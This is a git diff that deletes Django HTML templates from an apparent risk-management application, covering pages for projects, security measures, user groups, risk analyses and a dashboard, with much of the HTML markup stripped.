    {% trans "No exceptions yet." %}

    -
    -
    diff --git a/core/templates/core/fragments/watchlist_measures.html b/core/templates/core/fragments/watchlist_measures.html deleted file mode 100644 index c781763..0000000 --- a/core/templates/core/fragments/watchlist_measures.html +++ /dev/null @@ -1,50 +0,0 @@ -{% load i18n %} - -
    - - - - - - - - - - - {% for measure in measures_to_review %} - - - - - - - {% empty %} - - - - {% endfor %} - -
    - {% trans "Measure" %} - - {% trans "Domain" %} - - {% trans "Status" %} - - {% trans "ETA" %} -
    - {{ measure }} - - {{ measure.folder }} - - {{ measure.get_status_display }} - - {% if measure.eta < today %} - {% trans "expired" %} - {% endif %} - {{ measure.eta }} -
    - -

    {% trans "No measures yet." %}

    -
    -
    diff --git a/core/templates/core/group_create.html b/core/templates/core/group_create.html deleted file mode 100644 index aba0634..0000000 --- a/core/templates/core/group_create.html +++ /dev/null @@ -1,36 +0,0 @@ -{% extends 'core/base.html' %} -{% block content %} -{% load i18n %} -{% with page_title=_('New user group') %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} -
    -
    {% csrf_token %} -
    -

    {% trans "Group information" %}

    -
    -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% endfor %} -
    -
    - {% trans "Cancel" %} - -
    -
    -
    -
    -{% endblock content %} \ No newline at end of file diff --git a/core/templates/core/group_list.html b/core/templates/core/group_list.html deleted file mode 100644 index 82fcb12..0000000 --- a/core/templates/core/group_list.html +++ /dev/null @@ -1,99 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static core_extras %} - -{% block content %} -
    - {% with page_title=_('Groups') %} - {% include 'snippets/breadcrumbs.html' %} - {% endwith %} -
    -
    -
    -
    -
    - -
    - {{ filter.form.name }} -
    -
    -
    - -
    - {{ filter.form.orderby }} -
    -
    -
    - {% url 'usergroup-list' as short_path %} - {% if request.get_full_path != short_path %} - - {% endif %} - {% comment %} {% if add_usergroup %} - - {% endif %} {% endcomment %} -
    -
    - - - - - - - {% for user_group in user_groups %} - - - - - {% empty %} - - - - {% endfor %} - -
    {% trans "Group Name" %}{% trans "Actions" %}
    -
    -
    - {% if user_group.builtin %} - {% trans "built-in" %} - {% endif %} - {% if object_ids_change %} - - {{ user_group|capfirst }} - - {% else %} - - {{ user_group|capfirst }} - - {% endif %} -
    -
    -
    -
    - {% if user_group.id in object_ids_change %} - - - - - - {% endif %} - {% if user_group.id in object_ids_delete %} - {% include 'snippets/delete_button_modal.html' with object=user_group header=_("Delete user group?") model="usergroup" %} - {% endif %} -
    -
    -
    - -

    {% trans "No user group found." %}

    -
    -
    - {% include 'snippets/paginator.html' %} -
    -
    -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/group_update.html b/core/templates/core/group_update.html deleted file mode 100644 index 8a82de0..0000000 --- a/core/templates/core/group_update.html +++ /dev/null @@ -1,51 +0,0 @@ -{% extends 'core/base.html' %} -{% block content %} -{% load i18n %} -{% with page_title=_('Edit user group') %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} -
    -
    {% csrf_token %} -
    -

    {% trans "Group information" %}

    -
    -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% endfor %} -
    -
    - {% trans "Cancel" %} - -
    -
    -
    -
    -
    -
    -
    -

    {% trans "Associated users" %}

    -
    - {% include 'snippets/associated_users_list_nested.html' %} -
    -
    -
    -

    {% trans "Other users" %}

    -
    - {% include 'snippets/users_list_nested.html' %} -
    -
    - -{% endblock content %} \ No newline at end of file diff --git a/core/templates/core/index.html b/core/templates/core/index.html deleted file mode 100644 index 7bc7560..0000000 --- a/core/templates/core/index.html +++ /dev/null @@ -1,168 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n %} -{% block content %} - -
    - {% with page_title=_('Analysis registry') %} - {% include 'snippets/breadcrumbs.html' %} - {% endwith %} -
    -
    -
    - -
    - -
    - -
    - - {% comment %} {% endcomment %} -
    -
    -
    -
    -
    -
    - - - - - - - - - - - {% for analysis in page_obj %} - - - - - - - {% empty %} - - - - {% endfor %} - - -
    - {% trans "ID" %} - - {% trans "Assignee" %} - - {% trans "Last Update" %} - - -
    -
    - - {% if analysis.is_draft %} - {% trans "draft" %} - - {% else %} - {% trans "ready" %} - - {% endif %} - - -
    -

    - {{ analysis }} -

    -
    -
    -
    -

    - {% if analysis.auditor %}{{ analysis.auditor }}{% else %}--{% endif %} -

    -
    -

    - {{ analysis.updated_at|date }} -

    -
    - -
    -
    - -

    {% trans "No analysis found." %} {{ model.verbose_name }}

    -
    -
    -
    - - {% trans "Showing Page" %} {{ page_obj.number }} {% trans "of" %} {{ page_obj.paginator.num_pages }} - -
    - {% if page_obj.has_previous %} - - {% trans "First" %} - {% trans "Prev" %} - {% endif %} - {% if page_obj.has_next %} - - {% trans "Last" %} {% endif %} - -
    -
    -
    -
    - -
    - - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/mp.html b/core/templates/core/mp.html deleted file mode 100644 index 4e7e733..0000000 --- a/core/templates/core/mp.html +++ /dev/null @@ -1,15 +0,0 @@ -{% extends 'core/base.html' %} -{% block head %} -SecurityMeasure Plan follow-up - -{% endblock %} -{% block content %} -{% with page_title=_("Remediation plan") %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} -{% include 'snippets/mp_data.html' %} -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/mp_pdf.html b/core/templates/core/mp_pdf.html deleted file mode 100644 index 06f71a7..0000000 --- a/core/templates/core/mp_pdf.html +++ /dev/null @@ -1,4 +0,0 @@ -{% extends 'core/base_pdf.html' %} -{% block content %} -{% include 'snippets/mp_data.html' %} -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/mtg_list.html b/core/templates/core/mtg_list.html deleted file mode 100644 index 6defa0d..0000000 --- a/core/templates/core/mtg_list.html +++ /dev/null @@ -1,211 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static core_extras %} - -{% block content %} -
    - {% with page_title=_('Security measures') %} - {% include 'snippets/breadcrumbs.html' %} - {% endwith %} - -
    -
    -
    -
    -
    - -
    - {{ filter.form.name }} -
    -
    -
    - - - - - -
    -
    -
    -
    - -
    - {{ filter.form.orderby }} -
    -
    -
    - {% url 'securitymeasure-list' as short_path %} - {% if request.get_full_path != short_path %} - - {% endif %} - - {% if add_securitymeasure%} - {% include 'snippets/add_button_modal.html' with form=measure_create_form header=_("Add security measure") model="securitymeasure" content=_("New security measure") %} - {% endif %} - -
    -
    - - - - - - - - - - - - - {% for measure in measures %} - - - - - - - - - - - {% empty %} - - - - {% endfor %} - -
    {% trans "Measure" %}{% trans "Domain" %}{% trans "Type" %}{% trans "ETA" %}{% trans "Security function" %}{% trans "Analyses" %}{% trans "Projects" %}{% trans "Actions" %}
    -
    - {{ measure.get_status_display|lower}} - -
    -

    - {{ measure.name|capfirst }} -

    -
    -
    -
    -

    - {{ measure.folder }} -

    -
    -

    - {% if measure.type %} - {{ measure.get_type_display }} - {% endif %} -

    -
    -

    - {% if measure.eta %} - {{ measure.eta }} - {% else %} - -- - {% endif %} -

    -
    -

    - {% if measure.security_function %} - {{ measure.security_function }} - {% else %} - -- - {% endif %} -

    -
    -

    - {{ measure.analyses|length}} -

    -
    -

    - {{ measure.projects|length }} -

    -
    -
    - - {% if measure.id in object_ids_change %} - - - - - - {% endif %} - {% if measure.id in object_ids_delete %} - {% include 'snippets/delete_button_modal.html' with object=measure header=_("Delete security measure?") model='securitymeasure' %} - {% endif %} -
    -
    - -

    {% trans "No measure found." %}

    -
    - {% include 'snippets/paginator.html' %} -
    -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/mtg_update.html b/core/templates/core/mtg_update.html deleted file mode 100644 index 840d50e..0000000 --- a/core/templates/core/mtg_update.html +++ /dev/null @@ -1,38 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n %} -{% block content %} -{% with page_title=security_measure %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} - -
    -
    {% csrf_token %} -
    -

    {% trans "Measure summary" %}

    -
    -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% endfor %} -
    -
    - - - -
    -
    -
    -
    -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/my_profile_detailed.html b/core/templates/core/my_profile_detailed.html deleted file mode 100644 index 492e3db..0000000 --- a/core/templates/core/my_profile_detailed.html +++ /dev/null @@ -1,89 +0,0 @@ -{% extends 'core/base.html' %} -{% block content %} -{% load i18n static %} -{% load core_extras %} -{% with page_title=_('My profile') %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} -
    -
    -

    {{ user.last_name }} {{ user.first_name }}

    -
    - {% for field_label, field in user_fields.items %} -
    - -
    - {{ field }} -
    -
    - {% endfor %} -
    -
    - {% comment %} {% endcomment %} - - {% trans "Edit" %} - {% trans "Passkeys" %} -
    -
    -

    {% trans "User groups" %}

    -
    - - - - - - - {% for user_group in user_groups %} - - - - - {% empty %} - - - - {% endfor %} - -
    {% trans "Group Name" %}{% trans "Actions" %}
    -
    -
    - {% if user_group.builtin %} - {% trans "built-in" %} - {% endif %} - {% if object_ids_change %} - - {{ user_group|capfirst }} - - {% else %} - - {{ user_group|capfirst }} - - {% endif %} -
    -
    -
    -
    - {% if user_group.id in object_ids_change %} - - - - - - {% endif %} - {% if user_group.id in object_ids_delete %} - {% include 'snippets/delete_button_modal.html' with object=user_group header=_("Delete user group?") model="usergroup" %} - {% endif %} -
    -
    -
    - -

    {% trans "No user group found." %}

    -
    -
    - {% include 'snippets/paginator.html' %} -
    -
    -
    -{% endblock content %} \ No newline at end of file diff --git a/core/templates/core/overview.html b/core/templates/core/overview.html deleted file mode 100644 index b3fb226..0000000 --- a/core/templates/core/overview.html +++ /dev/null @@ -1,110 +0,0 @@ -{% extends 'core/base.html' %} - -{% load i18n %} - -{% block head %} - -{% endblock %} -{% block content %} -
    - {% with page_title=_('Overview') %} - {% include 'snippets/breadcrumbs.html' %} - {% endwith %} - -
    -
    - - - -
    {% trans "Overview" %}
    -
    -
    - - - -
    {% trans "Treatment" %}
    -
    -
    - - - -
    {% trans "Composer" %}
    -
    -
    - -
    -
    -
    - {% trans "Statistics" %} -
    -
    -
    -
    -
    {{ counters.Analysis }}
    {% trans "Analyses" %}
    -
    -
    -
    -
    {{ counters.RiskScenario }}
    {% trans "Scenarios" %}
    -
    -
    -
    -
    {{ counters.SecurityMeasure }}
    {% trans "Security measures" %}
    -
    -
    -
    -
    {{ counters.RiskAcceptance }}
    {% trans "Risk acceptances" %}
    -
    -
    -
    - -
    -
    -
    {% trans "My projects" %}
    -
    {% trans "Assigned to" %} {{ counters.Project }} {% trans "projects" %}
    -
    -
    -
    - {% trans "Current risk level per risk scenario" %} - - {% include 'snippets/donut_chart.html' with name='cur_rsk' s_label=cur_rsk_label values=risks_level.current %} - -
    -
    - {% trans "Residual risk level per risk scenario" %} - {% trans "Residual risk" as rsd_rsk_label %} - {% include 'snippets/donut_chart.html' with name='rsd_rsk' s_label=rsd_rsk_label values=risks_level.residual %} -
    -
    - {% trans "Security measures status" %} - {% include 'core/fragments/measures_status.html' with name='security_measures_status' labels=security_measure_status.labels values=security_measure_status.values %} -
    -
    -
    - -
    -
    -
    {% trans "Watch list" %}
    -
    {% trans "Items that have expired or with close ETA" %}
    -
    -
    -
    - {% trans "Measures to review" %} -
    {% include 'core/fragments/watchlist_measures.html' %}
    -
    -
    - {% trans "Exceptions to review" %} -
    {% include 'core/fragments/watchlist_exceptions.html' %}
    -
    -
    -
    -
    -
    - {% include 'core/project_select.html' with analyses=analyses %} -
    - {% comment %} Don't know why but when we put openTab === 2 before openTab === 3 the tab 2 (composer) is not displayed {% endcomment %} -
    - {% include 'core/treatment.html' with agg_data=agg_data measures=ord_security_measures %} -
    -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/password_change.html b/core/templates/core/password_change.html deleted file mode 100644 index ab66d7f..0000000 --- a/core/templates/core/password_change.html +++ /dev/null @@ -1,37 +0,0 @@ -{% extends 'core/base.html' %} -{% block content %} -{% load i18n %} -{% with page_title=_('Change password') %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} - -
    -
    {% csrf_token %} -
    -

    {% trans "Enter a new password for the user " %} {{ this_user }}.

    -
    -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% endfor %} -
    -
    - - -
    -
    -
    -
    -{% endblock content %} \ No newline at end of file diff --git a/core/templates/core/pd_update.html b/core/templates/core/pd_update.html deleted file mode 100644 index 2a78175..0000000 --- a/core/templates/core/pd_update.html +++ /dev/null @@ -1,45 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static %} -{% block content %} -{% with page_title=domain %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} - -
    -
    {% csrf_token %} -
    -
    -

    {{ form.non_field_errors|striptags }}

    - {% for field in form %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% endfor %} -
    -
    - - - -
    -
    -
    -
    -
    -

    {% trans "Associated Projects" %}

    - {% include 'snippets/add_button_modal.html' with form=project_create_form header=_("Add project") model="project" content=_("New project") %} -
    - {% include 'snippets/project_list_nested.html' %} -
    -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/project_create.html b/core/templates/core/project_create.html deleted file mode 100644 index 73c444c..0000000 --- a/core/templates/core/project_create.html +++ /dev/null @@ -1,48 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n %} -{% block content %} -{% with page_title=_("New project") %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} - -
    -
    {% csrf_token %} -
    -
    -
    -
    -

    {% trans "Project Name" %}

    - {{ form.name.errors }} - {{ form.name }} -
    -
    -

    {% trans "Internal ID" %}

    - {{ form.internal_reference.errors }} - {{ form.internal_reference }} -
    - -
    -
    -

    {% trans "Domain" %}

    - {{ form.folder.errors }} - {{ form.folder }} -
    -
    -

    {% trans "Status" %}

    - {{ form.lc_status.errors }} - {{ form.lc_status}} -
    -
    -

    {% trans "Description" %}

    - {{ form.description.errors }} - {{ form.description }} -
    -
    - -
    - {% trans "Cancel" %} - -
    -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/project_domain_list.html b/core/templates/core/project_domain_list.html deleted file mode 100644 index f661c13..0000000 --- a/core/templates/core/project_domain_list.html +++ /dev/null @@ -1,94 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static core_extras %} - -{% block content %} -{% with page_title=_('Projects domains') %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} -
    -
    - -
    -
    -
    -
    - -
    - {{ filter.form.name }} -
    -
    -
    - -
    - {{ filter.form.orderby }} -
    -
    -
    - {% url 'folder-list' as short_path %} - {% if request.get_full_path != short_path %} - - {% endif %} - - {% if add_folder %} - {% include 'snippets/add_button_modal.html' with form=projects_domain_create_form header=_("Add projects domain") model="folder" content=_("New projects domain") %} - {% endif %} -
    -
    - - - - - - - - {% for domain in page_obj %} - - - - - - {% empty %} - - - - {% endfor %} - -
    {% trans "Domain" %}{% trans "Description" %}{% trans "Actions" %}
    -
    -
    -

    - {{ domain }} -

    -
    -
    -
    -

    - {% if domain.description%}{{ domain.description|linebreaksbr }}{% else %}--{% endif %} -

    -
    -
    - - {% if domain.id in object_ids_change %} - - - - - - {% endif %} - {% if domain.id in object_ids_delete %} - {% include 'snippets/delete_button_modal.html' with object=domain header=_("Delete projects domain?") model="folder" %} - {% endif %} - -
    -
    - -

    {% trans "No projects domain found." %}

    -
    - {% include 'snippets/paginator.html' %} -
    -
    -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/project_list.html b/core/templates/core/project_list.html deleted file mode 100644 index 022499d..0000000 --- a/core/templates/core/project_list.html +++ /dev/null @@ -1,184 +0,0 @@ -{% extends 'core/base.html' %} - -{% load i18n static core_extras %} - -{% block content %} -{% with page_title=_('Projects') %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} -
    - -
    -
    -
    -
    - -
    - {{ filter.form.name }} -
    -
    -
    - - - - - -
    -
    -
    -
    - -
    - {{ filter.form.orderby }} -
    -
    -
    - {% url 'project-list' as short_path %} - {% if request.get_full_path != short_path %} - - {% endif %} - - {% if add_project %} - {% include 'snippets/add_button_modal.html' with form=project_create_form header=_("Add project") model="project" content=_("New project") %} - {% endif %} -
    -
    - - - - - - {% comment %} {% endcomment %} - - - - {% for project in projects %} - - - - - {% comment %} {% endcomment %} - - - {% empty %} - - - - {% endfor %} - -
    {% trans "Project Name" %}{% trans "Domain" %}{% trans "Description" %}{% trans "Status" %}{% trans "Actions" %}
    -
    - {{ project.get_lc_status_display|lower}} - -
    -

    - {{ project.name }} -

    -
    -
    -
    -

    - {{ project.folder }} -

    -
    -

    - {{ project.description|linebreaksbr }} -

    -
    -

    - {% if project.lc_status %}{{ project.get_lc_status_display }}{% else %}--{% endif %} -

    -
    -
    - - {% if object_ids_change %} - - - - - - {% endif %} - {% if object_ids_delete %} - {% include 'snippets/delete_button_modal.html' with object=project header=_("Delete project?") model='project' %} - {% endif %} - -
    -
    - -

    {% trans "No project found." %}

    -
    - {% include 'snippets/paginator.html' %} -
    -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/project_select.html b/core/templates/core/project_select.html deleted file mode 100644 index 91e9d2c..0000000 --- a/core/templates/core/project_select.html +++ /dev/null @@ -1,168 +0,0 @@ -{% load i18n %} - - - - -
    -
    -
    {% trans "Composer" %}
    - -
    - {% trans "This will help you aggregate multiple components (projects) to get the compiled view on your risk. This is particularly useful for two use cases:" %} -
      -
    • {% trans "business intelligence approach to focus on a specific subset across different project domains (eg. across divisions)" %}
    • -
    • {% trans "you are interested in the risk assessment of a specific system, for which you need the risk assessment of the underlying components" %}
    • -
    -
    -
    -
    - -
    - -
    -
    -
    -
    - -
    - -
    -
    -
    - - - -
    -
    -
    -
    -
    -
    - -
    -
    -
    -
    - -
    - - - -
    -
    diff --git a/core/templates/core/project_update.html b/core/templates/core/project_update.html deleted file mode 100644 index dad8b3e..0000000 --- a/core/templates/core/project_update.html +++ /dev/null @@ -1,59 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static %} -{% block content %} -{% with page_title=project %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} - -
    -
    {% csrf_token %} -
    -
    -
    -
    -
    -

    {% trans "Project Name" %}

    - {{ form.name.errors }} - {{ form.name }} -
    -
    -

    {{ form.internal_reference.label }}

    - {{ form.internal_reference.errors }} - {{ form.internal_reference }} -
    - -
    -
    -

    {% trans "Domain" %}

    - {{ form.folder.errors }} - {{ form.folder }} -
    -
    -

    {% trans "Status" %}

    - {{ form.lc_statuserrors }} - {{ form.lc_status}} -
    -
    -

    {% trans "Description" %}

    - {{ form.description.errors }} - {{ form.description }} -
    -
    -
    - - - -
    -
    -
    -
    -
    -
    -

    {% trans "Associated risk analyses" %}

    - {% include 'snippets/add_button_modal.html' with form=analysis_create_form header=_("Add analysis") model="analysis" content=_("New risk analysis") %} -
    - {% include 'snippets/ra_list_nested.html' %} -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/quick_start.html b/core/templates/core/quick_start.html deleted file mode 100644 index 58b0740..0000000 --- a/core/templates/core/quick_start.html +++ /dev/null @@ -1,200 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static %} - -{% block content %} -{% with page_title=_('Quick start') %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} - -
    -
    -
    -

    {% trans "To get started, you need:" %}

    -
    -
    -
    -
    {% trans "Rating matrix" %}
    -
    - -
    -
    - {% trans "As administrator, you are in charge to import at least one" %} - {% trans "rating matrix" %}. -
    -
    -
    -
    {% trans "Imports" %}
    -
    - -
    -
    - {% trans "You will need security functions and threats to perform a security analysis. You can either define custom" %} -
    - - {% trans "security functions" %} - - {% include "snippets/modal/modal.html" with modal_action="create" model="securityfunction" form=security_function_create_form header=_("Add security function") %} -
    - {% trans "and" %} -
    - - {% trans "threats" %} - - {% include "snippets/modal/modal.html" with modal_action="create" model="threat" form=threat_create_form header=_("Add threat") %} -
    - {% trans "or import them from a" %} {% trans "library" %}. -
    -
    -
    -
    {% trans "Projects domains" %}
    -
    - -
    -
    - {% trans "It's time to define some" %} -
    - - {% trans "projects domains" %} - - {% include "snippets/modal/modal.html" with modal_action="create" model="folder" form=projects_domain_create_form header=_("Add projects domain") %} -
    - {% trans "to organize your projects" %}. -
    -
    -
    -
    {% trans "Users and groups" %}
    -
    - -
    -
    - {% trans "Now declare a few" %} - {% trans "users" %} - {% trans "and assign them to groups corresponding to their roles (domain manager, analyst, auditor, ...)" %}. -
    -
    -
    -
    {% trans "Assets" %}
    -
    - -
    -
    - {% trans "Finally, you can identify and create relevant" %} -
    - - {% trans "assets" %} - - {% include "snippets/modal/modal.html" with modal_action="create" model="asset" form=asset_create_form header=_("Add asset") %} -
    - {% trans "for your organization" %}. -
    -
    -
    -
    -
    -
    -

    {% trans "Now, you can start your risk assessment:" %}

    -
    -
    -
    -
    {% trans "Project" %}
    -
    - -
    -
    - {% trans "As domain manager, create a" %} -
    - - {% trans "project" %} - - {% include "snippets/modal/modal.html" with modal_action="create" model="project" form=project_create_form header=_("Add project") %} -
    - {% trans "within an existing domain" %}. -
    -
    -
    -
    {% trans "Risk analysis" %}
    -
    - -
    -
    - {% trans "You can now start a new" %} -
    - - {% trans "risk analysis" %}. - - {% include "snippets/modal/modal.html" with modal_action="create" model="analysis" form=analysis_create_form header=_("Add analysis") %} -
    - {% trans "Identify the" %} -
    - - {% trans "risk scenarios" %} - - {% include "snippets/modal/modal.html" with modal_action="create" model="riskscenario" form=riskscenario_create_form header=_("Add risk scenario") %} -
    - {% trans "based on threats to assets, and assess the current risk level. You can use the" %} - {% trans "scoring assistant" %} - {% trans "to help you if needed." %} -
    -
    -
    -
    {% trans "Risk treatment" %}
    -
    - -
    -
    - {% trans "For each risk scenario, try to define and apply additional" %} -
    - - {% trans "security measures" %} - - {% include "snippets/modal/modal.html" with modal_action="create" model="securitymeasure" form=securitymeasure_create_form header=_("Add security measure") %} -
    - {% trans "based on security functions, and assess the residual risk level." %} -
    -
    -
    -
    {% trans "Check consistency" %}
    -
    - -
    -
    - {% trans "X-Rays" %} - {% trans "will help you improve the quality of your analysis by pinpointing various inconsistencies." %} -
    -
    -
    -
    {% trans "Report" %}
    -
    - -
    -
    - {% trans "To display your analysis, select it from the" %} - {% trans "analysis registry." %} - {% trans "You can also export the risk analysis or its treatment plan as PDF/CSV." %} -
    -
    -
    -
    -
    -
    -
    {% trans "Further steps" %}
    -
    - -
    -
    -
    -
    - {% trans "Explore the dashboard to have an" %} - {% trans "overview" %} - {% trans "of your analyses and check for coming deadlines with the" %} - {% trans "calendar" %}. - {% trans "You can also manage" %} - {% trans "risk acceptances" %} - {% trans "for risks that are not currently covered." %} -
    -
    -
    -
    -
    -
    -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/ra.html b/core/templates/core/ra.html deleted file mode 100644 index a9fc1e1..0000000 --- a/core/templates/core/ra.html +++ /dev/null @@ -1,15 +0,0 @@ -{% extends 'core/base.html' %} -{% block head %} -{{ analysis }} - -{% endblock %} -{% block content %} -{% with page_title=analysis %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} -{% include 'snippets/ra_data.html' %} -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/ra_create.html b/core/templates/core/ra_create.html deleted file mode 100644 index 2ba3a70..0000000 --- a/core/templates/core/ra_create.html +++ /dev/null @@ -1,39 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n %} -{% block content %} -{% with page_title=_("New Analysis") %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} - -
    -
    {% csrf_token %} -
    -
    -
    - {% for field in form %} -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} - {% if field.field.widget.attrs.disabled %} - - {% endif %} -
    - {{ field.help_text|safe }} -
    -
    -
    - {% endfor %} -
    -
    -
    - {% trans "Cancel" %} - -
    -
    - -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/ra_pdf.html b/core/templates/core/ra_pdf.html deleted file mode 100644 index 563c5bc..0000000 --- a/core/templates/core/ra_pdf.html +++ /dev/null @@ -1,4 +0,0 @@ -{% extends 'core/base_pdf.html' %} -{% block content %} -{% include 'snippets/ra_data.html' with pdf=True scenarios=context %} -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/ra_update.html b/core/templates/core/ra_update.html deleted file mode 100644 index de55328..0000000 --- a/core/templates/core/ra_update.html +++ /dev/null @@ -1,72 +0,0 @@ -{% extends 'core/base.html' %} -{% load i18n static core_extras %} -{% block content %} -{% with page_title=analysis %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} - -
    -
    -
    -
    {% csrf_token %} -

    {{ form.non_field_errors|striptags }}

    -
    -
    -
    -

    {% trans "Risk analysis" %}

    -

    {{ form.non_field_errors|striptags }}

    -
    - - - {% for field in form %} - {% if field.field.widget|class == "CheckboxInput" %} - {% include 'snippets/form_field_row.html' %} - {% else %} -
    -
    - -
    - {% for error in field.errors %} -

    {{ error|striptags }}

    - {% endfor %} - {{ field }} - {% if field.field.widget.attrs.disabled %} - - {% endif %} -

    {{ field.help_text }}

    -
    -
    -
    - {% endif %} - {% endfor %} - -
    -
    - - - -
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -

    {% trans "Associated risk scenarios" %}

    -
    - {% include 'snippets/add_button_modal.html' with form=risk_scenario_create_form header=_("Add Risk Scenario") model="riskscenario" content=_("New risk scenario") %} -
    -
    - {% include 'snippets/ri_list_nested.html' with edit=True %} -
    -
    -
    -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/review.html b/core/templates/core/review.html deleted file mode 100644 index 96e2a98..0000000 --- a/core/templates/core/review.html +++ /dev/null @@ -1,82 +0,0 @@ -{% extends 'core/base.html' %} - -{% load i18n %} - -{% block content %} -{% with page_title=_('X-Rays') %} - {% include 'snippets/breadcrumbs.html' %} -{% endwith %} -
    -
    -
    - - {% for analysis in context %} -
    -
    {{analysis}}
    - {% if analysis.quality_check.count == 0 %} -
    {% trans "All good" %}
    - {% else %} - - {% if analysis.quality_check.errors %} -
    - {% blocktrans count counter=analysis.quality_check.errors|length %} - {{ counter }} error found - {% plural %} - {{ counter }} errors found - {% endblocktrans %} -
    -
      - {% for item in analysis.quality_check.errors %} -
    • {{ item.msg }} | - {% include 'snippets/view_edit.html' with item=item %} -
    • - {% endfor %} -
    - {% endif %} - {% if analysis.quality_check.warnings %} -
    - {% blocktrans count counter=analysis.quality_check.warnings|length %} - {{ counter }} warning found - {% plural %} - {{ counter }} warnings found - {% endblocktrans %} -
    -
      - {% for item in analysis.quality_check.warnings %} -
    • {{ item.msg }} | - {% include 'snippets/view_edit.html' with item=item %} -
    • - {% endfor %} -
    - {% endif %} - {% if analysis.quality_check.info %} -
    - {% blocktrans count counter=analysis.quality_check.info|length %} - {{ counter }} information to consider - {% plural %} - {{ counter }} informations to consider - {% endblocktrans %} -
    -
      - {% for item in analysis.quality_check.info %} -
    • {{ item.msg }} | - {% include 'snippets/view_edit.html' with item=item %} -
    • - {% endfor %} -
    - {% endif %} - {% endif %} -
    - {% empty %} -
    - -

    {% trans "No analysis found." %} {{ model.verbose_name }}

    -
    - {% endfor %} - - - -
    -
    -
    -{% endblock %} \ No newline at end of file diff --git a/core/templates/core/ri_create.html b/core/templates/core/ri_create.html deleted file mode 100644 index 8a240fd..0000000 --- a/core/templates/core/ri_create.html +++ /dev/null @@ -1,108 +0,0 @@ -{% extends 'core/base.html' %} -{% block content %} -{% load i18n %} -{% with page_title=_('New risk scenario') %} -{% include 'snippets/breadcrumbs.html' %} -{% endwith %} -
    -
    {% csrf_token %} -

    {{ form.non_field_errors|striptags }}

    -
    -
    -
    -

    {% trans "Summary" %}

    -
    -
    -
    -

    {% trans "Analysis" %}

    -

    {{ analysis }}

    -
    -
    -

    {% trans "Auditor" %}

    -

    {{ analysis.auditor.get_full_name }}

    -
    -
    -
    -

    {% trans "Scenario Title" %}

    - {{ form.name.errors }} - {{ form.name }} -
    -
    -

    {% trans "Threat" %}

    - {{ form.threat.errors }} - {{ form.threat }} -
    -
    -

    {% trans "Scenario" %}

    - {{ form.description.errors }} - {{ form.description }} -
    -
    -
    -
    -
    -

    {% trans "Residual risk level" %}

    -
    -
    -

    {% trans "Residual probability" %}

    - {{ form.residual_proba.errors }} - {{ form.residual_proba }} -
    -
    -

    {% trans "Residual impact" %}

    - {{ form.residual_impact.errors }} - {{ form.residual_impact }} -
    -
    -
    -
    -
    -

    {% trans "Follow-up" %}

    -

    {% trans "Treatment status" %}

    - {{ form.treatment.errors }} - {{ form.treatment }} -
    -
    -

    {% trans "Comments" %}

    - {{ form.comments.errors }} - {{ form.comments }} -
    -
    -
    -
    -
    -
    -

    {% trans "Current risk level" %}

    -

    {% trans "Existing measures" %}

    - {{ form.existing_measures.errors }} - {{ form.existing_measures }} -

    {{ form.existing_measures.help_text|striptags|capfirst }}

    - -
    -
    -

    {% trans "Current probability" %}

